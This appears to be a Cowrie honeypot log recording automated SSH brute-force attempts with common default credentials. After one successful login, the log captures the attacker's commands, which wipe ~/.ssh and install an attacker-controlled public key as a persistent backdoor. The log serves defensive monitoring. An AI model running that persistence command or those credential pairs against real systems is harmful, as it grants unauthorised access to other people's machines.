{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:14:39.919597Z","src_ip":"212.227.235.229","session":"150d2f940113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57260,"dst_ip":"1.2.3.4","dst_port":22,"session":"643403857458","protocol":"ssh","message":"New connection: 212.227.125.160:57260 (1.2.3.4:22) [session: 643403857458]","sensor":"my-vps","timestamp":"2025-08-31T01:14:43.565565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:43.566550Z","src_ip":"212.227.125.160","session":"643403857458"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:14:43.639363Z","src_ip":"212.227.125.160","session":"643403857458"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:43.867950Z","src_ip":"212.227.125.160","session":"643403857458"}
{"eventid":"cowrie.login.failed","username":"dev","password":"password","message":"login attempt [dev/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:44.655653Z","src_ip":"212.227.235.229","session":"150d2f940113"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:45.016634Z","src_ip":"212.227.125.160","session":"643403857458"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:46.795235Z","src_ip":"212.227.235.229","session":"150d2f940113"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61614,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ac451e76d85","protocol":"ssh","message":"New connection: 217.72.205.35:61614 (1.2.3.4:22) [session: 0ac451e76d85]","sensor":"my-vps","timestamp":"2025-08-31T01:14:49.368682Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:49.370052Z","src_ip":"217.72.205.35","session":"0ac451e76d85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35087,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ce6021c13dd","protocol":"telnet","message":"New connection: 212.227.125.160:35087 (1.2.3.4:23) [session: 4ce6021c13dd]","sensor":"my-vps","timestamp":"2025-08-31T01:14:51.742868Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47788,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b89441b4573","protocol":"ssh","message":"New connection: 212.227.125.160:47788 (1.2.3.4:22) [session: 1b89441b4573]","sensor":"my-vps","timestamp":"2025-08-31T01:14:53.977301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:53.978856Z","src_ip":"212.227.125.160","session":"1b89441b4573"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:14:54.053512Z","src_ip":"212.227.125.160","session":"1b89441b4573"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-31T01:14:54.334264Z","src_ip":"212.227.125.160","session":"1b89441b4573"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:14:55.485292Z","src_ip":"212.227.125.160","session":"1b89441b4573"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55624,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac4b42c6a56a","protocol":"ssh","message":"New connection: 212.227.125.160:55624 (1.2.3.4:22) [session: ac4b42c6a56a]","sensor":"my-vps","timestamp":"2025-08-31T01:14:59.491045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:14:59.887928Z","src_ip":"212.227.125.160","session":"ac4b42c6a56a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:14:59.888804Z","src_ip":"212.227.125.160","session":"ac4b42c6a56a"}
{"eventid":"cowrie.login.failed","username":"dev","password":"password","message":"login attempt [dev/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:02.533205Z","src_ip":"212.227.125.160","session":"ac4b42c6a56a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43262,"dst_ip":"1.2.3.4","dst_port":22,"session":"a758c057fbc1","protocol":"ssh","message":"New connection: 212.227.235.229:43262 (1.2.3.4:22) [session: a758c057fbc1]","sensor":"my-vps","timestamp":"2025-08-31T01:15:03.591435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:15:03.594362Z","src_ip":"212.227.235.229","session":"a758c057fbc1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:15:03.836861Z","src_ip":"212.227.235.229","session":"a758c057fbc1"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:04.186875Z","src_ip":"212.227.125.160","session":"ac4b42c6a56a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40766,"dst_ip":"1.2.3.4","dst_port":22,"session":"f401bf9bb712","protocol":"ssh","message":"New connection: 212.227.125.160:40766 (1.2.3.4:22) [session: f401bf9bb712]","sensor":"my-vps","timestamp":"2025-08-31T01:15:04.362300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:04.369567Z","src_ip":"212.227.125.160","session":"f401bf9bb712"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:04.437124Z","src_ip":"212.227.125.160","session":"f401bf9bb712"}
{"eventid":"cowrie.login.failed","username":"ansibleuser","password":"ansibleuser","message":"login attempt [ansibleuser/ansibleuser] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:04.793084Z","src_ip":"212.227.235.229","session":"a758c057fbc1"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:04.851528Z","src_ip":"212.227.125.160","session":"f401bf9bb712"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:05.944152Z","src_ip":"212.227.125.160","session":"f401bf9bb712"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:06.039395Z","src_ip":"212.227.235.229","session":"a758c057fbc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45076,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7bae54fb18c","protocol":"ssh","message":"New connection: 212.227.235.229:45076 (1.2.3.4:22) [session: a7bae54fb18c]","sensor":"my-vps","timestamp":"2025-08-31T01:15:07.838653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:15:07.839424Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:15:07.908828Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.login.success","username":"root","password":"andy123","message":"login attempt [root/andy123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.217572Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:15:08.372688Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.373624Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.375114Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.443093Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:15:08.638849Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.639930Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.715757Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.716673Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45492,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f017b601ca3","protocol":"ssh","message":"New connection: 212.227.235.229:45492 (1.2.3.4:22) [session: 2f017b601ca3]","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.780839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.781799Z","src_ip":"212.227.235.229","session":"2f017b601ca3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:15:08.848588Z","src_ip":"212.227.235.229","session":"2f017b601ca3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:09.157194Z","src_ip":"212.227.235.229","session":"2f017b601ca3"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:10.227585Z","src_ip":"212.227.235.229","session":"2f017b601ca3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46112,"dst_ip":"1.2.3.4","dst_port":22,"session":"16baed530d22","protocol":"ssh","message":"New connection: 212.227.235.229:46112 (1.2.3.4:22) [session: 16baed530d22]","sensor":"my-vps","timestamp":"2025-08-31T01:15:10.292452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:15:10.293421Z","src_ip":"212.227.235.229","session":"16baed530d22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@op